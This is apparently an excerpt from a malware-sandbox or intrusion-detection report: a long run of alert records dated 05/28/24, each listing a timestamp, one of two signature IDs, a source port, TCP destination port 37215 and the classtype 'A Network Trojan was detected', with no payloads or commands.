                  Timestamp:05/28/24-08:59:06.496147
                  SID:2829579
                  Source Port:54646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528961
                  SID:2835222
                  Source Port:34560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530991
                  SID:2835222
                  Source Port:58406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720195
                  SID:2829579
                  Source Port:34290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.318981
                  SID:2835222
                  Source Port:55334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.622228
                  SID:2835222
                  Source Port:32840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649418
                  SID:2829579
                  Source Port:45612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.371975
                  SID:2835222
                  Source Port:58802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493433
                  SID:2829579
                  Source Port:44800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545119
                  SID:2835222
                  Source Port:52986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490197
                  SID:2829579
                  Source Port:34718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886199
                  SID:2835222
                  Source Port:54194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720195
                  SID:2835222
                  Source Port:34290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888346
                  SID:2835222
                  Source Port:46742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292637
                  SID:2835222
                  Source Port:39872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766539
                  SID:2835222
                  Source Port:36652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.881181
                  SID:2829579
                  Source Port:60782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.323448
                  SID:2829579
                  Source Port:47120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930376
                  SID:2829579
                  Source Port:34154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277368
                  SID:2829579
                  Source Port:34198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.797125
                  SID:2835222
                  Source Port:47820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661207
                  SID:2835222
                  Source Port:55570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.604058
                  SID:2835222
                  Source Port:43516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766769
                  SID:2835222
                  Source Port:40900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277643
                  SID:2835222
                  Source Port:43322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529302
                  SID:2835222
                  Source Port:60280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737612
                  SID:2835222
                  Source Port:34982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.606788
                  SID:2835222
                  Source Port:42572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:12.604401
                  SID:2835222
                  Source Port:42656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.622228
                  SID:2829579
                  Source Port:32840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742324
                  SID:2835222
                  Source Port:56436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911698
                  SID:2829579
                  Source Port:43008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766071
                  SID:2829579
                  Source Port:52016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922838
                  SID:2829579
                  Source Port:58040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546652
                  SID:2829579
                  Source Port:50496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769287
                  SID:2829579
                  Source Port:56230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742437
                  SID:2835222
                  Source Port:52256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911136
                  SID:2835222
                  Source Port:54278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584136
                  SID:2835222
                  Source Port:52996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300162
                  SID:2829579
                  Source Port:54564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.601730
                  SID:2835222
                  Source Port:50140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847431
                  SID:2835222
                  Source Port:59336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496147
                  SID:2835222
                  Source Port:54646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545060
                  SID:2835222
                  Source Port:56254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489201
                  SID:2829579
                  Source Port:34984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629539
                  SID:2835222
                  Source Port:41716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768681
                  SID:2829579
                  Source Port:57936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.512062
                  SID:2829579
                  Source Port:40334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.578656
                  SID:2835222
                  Source Port:52394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.700998
                  SID:2829579
                  Source Port:55172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912247
                  SID:2835222
                  Source Port:44432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.318961
                  SID:2835222
                  Source Port:42704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578051
                  SID:2829579
                  Source Port:35240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769350
                  SID:2829579
                  Source Port:43616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.606652
                  SID:2829579
                  Source Port:34510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.587358
                  SID:2829579
                  Source Port:34744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908190
                  SID:2835222
                  Source Port:36820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.915656
                  SID:2829579
                  Source Port:45376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847705
                  SID:2829579
                  Source Port:60734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.531420
                  SID:2829579
                  Source Port:41176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.523570
                  SID:2835222
                  Source Port:48044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781093
                  SID:2829579
                  Source Port:52080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788079
                  SID:2829579
                  Source Port:55144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789391
                  SID:2835222
                  Source Port:54600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849050
                  SID:2835222
                  Source Port:37082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.607399
                  SID:2835222
                  Source Port:36346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489396
                  SID:2829579
                  Source Port:38166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887961
                  SID:2835222
                  Source Port:40756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911708
                  SID:2829579
                  Source Port:60028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769379
                  SID:2829579
                  Source Port:59170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577248
                  SID:2829579
                  Source Port:58906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555670
                  SID:2835222
                  Source Port:58868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492454
                  SID:2835222
                  Source Port:45452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584391
                  SID:2835222
                  Source Port:33134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870950
                  SID:2829579
                  Source Port:53900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920015
                  SID:2835222
                  Source Port:52866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542791
                  SID:2829579
                  Source Port:44570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.549331
                  SID:2829579
                  Source Port:44984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.817742
                  SID:2829579
                  Source Port:35596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844808
                  SID:2829579
                  Source Port:56684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495937
                  SID:2829579
                  Source Port:49742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594948
                  SID:2835222
                  Source Port:43258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.661689
                  SID:2835222
                  Source Port:56396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316577
                  SID:2829579
                  Source Port:51468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660430
                  SID:2829579
                  Source Port:42658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494869
                  SID:2829579
                  Source Port:43332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.787554
                  SID:2829579
                  Source Port:54076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316548
                  SID:2829579
                  Source Port:49588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585363
                  SID:2829579
                  Source Port:37026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.588000
                  SID:2835222
                  Source Port:50334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555586
                  SID:2835222
                  Source Port:52352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767760
                  SID:2829579
                  Source Port:42264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.771022
                  SID:2835222
                  Source Port:49716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775973
                  SID:2829579
                  Source Port:46858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742603
                  SID:2829579
                  Source Port:34286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.857468
                  SID:2829579
                  Source Port:40578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920826
                  SID:2835222
                  Source Port:40998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576093
                  SID:2829579
                  Source Port:45180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.718833
                  SID:2835222
                  Source Port:42538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530960
                  SID:2835222
                  Source Port:48768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294606
                  SID:2829579
                  Source Port:35196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874016
                  SID:2829579
                  Source Port:33326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292778
                  SID:2829579
                  Source Port:52008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768635
                  SID:2829579
                  Source Port:34996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578626
                  SID:2835222
                  Source Port:39006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316232
                  SID:2835222
                  Source Port:38332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912188
                  SID:2835222
                  Source Port:46980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.771124
                  SID:2835222
                  Source Port:60016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296752
                  SID:2835222
                  Source Port:39368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.301013
                  SID:2835222
                  Source Port:58292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766382
                  SID:2835222
                  Source Port:51996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.673808
                  SID:2835222
                  Source Port:42190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.738142
                  SID:2829579
                  Source Port:37034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.864829
                  SID:2835222
                  Source Port:48062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312486
                  SID:2829579
                  Source Port:45332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278452
                  SID:2835222
                  Source Port:45418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579121
                  SID:2835222
                  Source Port:40276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.805326
                  SID:2835222
                  Source Port:34958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.491404
                  SID:2829579
                  Source Port:35416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316008
                  SID:2829579
                  Source Port:38804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546708
                  SID:2829579
                  Source Port:51040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912131
                  SID:2835222
                  Source Port:42116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277310
                  SID:2835222
                  Source Port:60870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.859306
                  SID:2835222
                  Source Port:50574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912218
                  SID:2835222
                  Source Port:39458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316352
                  SID:2835222
                  Source Port:56062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696691
                  SID:2829579
                  Source Port:45902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930518
                  SID:2829579
                  Source Port:49134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702267
                  SID:2829579
                  Source Port:34570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911962
                  SID:2835222
                  Source Port:58906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296614
                  SID:2829579
                  Source Port:59652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768743
                  SID:2835222
                  Source Port:51652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887419
                  SID:2835222
                  Source Port:33150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.645111
                  SID:2835222
                  Source Port:38346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664467
                  SID:2835222
                  Source Port:50348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843867
                  SID:2835222
                  Source Port:42068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585572
                  SID:2829579
                  Source Port:44110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.920365
                  SID:2835222
                  Source Port:43008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767760
                  SID:2835222
                  Source Port:42264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742257
                  SID:2835222
                  Source Port:53238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.787455
                  SID:2829579
                  Source Port:36050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886190
                  SID:2835222
                  Source Port:44608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.900443
                  SID:2835222
                  Source Port:39152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651693
                  SID:2829579
                  Source Port:47966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912552
                  SID:2835222
                  Source Port:38574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.510254
                  SID:2835222
                  Source Port:38594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.606717
                  SID:2829579
                  Source Port:33122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849042
                  SID:2835222
                  Source Port:44546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789818
                  SID:2835222
                  Source Port:49190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661298
                  SID:2829579
                  Source Port:60714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577021
                  SID:2829579
                  Source Port:38724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790273
                  SID:2829579
                  Source Port:55588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576902
                  SID:2835222
                  Source Port:43294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678634
                  SID:2835222
                  Source Port:42810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.918874
                  SID:2835222
                  Source Port:49090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493322
                  SID:2835222
                  Source Port:44364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874544
                  SID:2835222
                  Source Port:33958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742652
                  SID:2835222
                  Source Port:47298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.535988
                  SID:2829579
                  Source Port:42502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.371975
                  SID:2829579
                  Source Port:38134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493313
                  SID:2835222
                  Source Port:55310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.549331
                  SID:2835222
                  Source Port:44984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.864881
                  SID:2835222
                  Source Port:46154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555331
                  SID:2835222
                  Source Port:38674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789500
                  SID:2829579
                  Source Port:38690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845949
                  SID:2829579
                  Source Port:58782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719720
                  SID:2829579
                  Source Port:58710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650835
                  SID:2829579
                  Source Port:59232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719829
                  SID:2829579
                  Source Port:45934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530460
                  SID:2835222
                  Source Port:33328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.875552
                  SID:2829579
                  Source Port:41712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583521
                  SID:2829579
                  Source Port:35332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927153
                  SID:2835222
                  Source Port:42804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494677
                  SID:2835222
                  Source Port:42366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846426
                  SID:2829579
                  Source Port:59422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591028
                  SID:2835222
                  Source Port:35866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660464
                  SID:2835222
                  Source Port:37432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768688
                  SID:2829579
                  Source Port:54478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719488
                  SID:2835222
                  Source Port:42580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.791008
                  SID:2835222
                  Source Port:46022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795418
                  SID:2835222
                  Source Port:60960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527134
                  SID:2835222
                  Source Port:55046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659666
                  SID:2835222
                  Source Port:41820
                  Destination Port:37215
                  Protocol:TCP
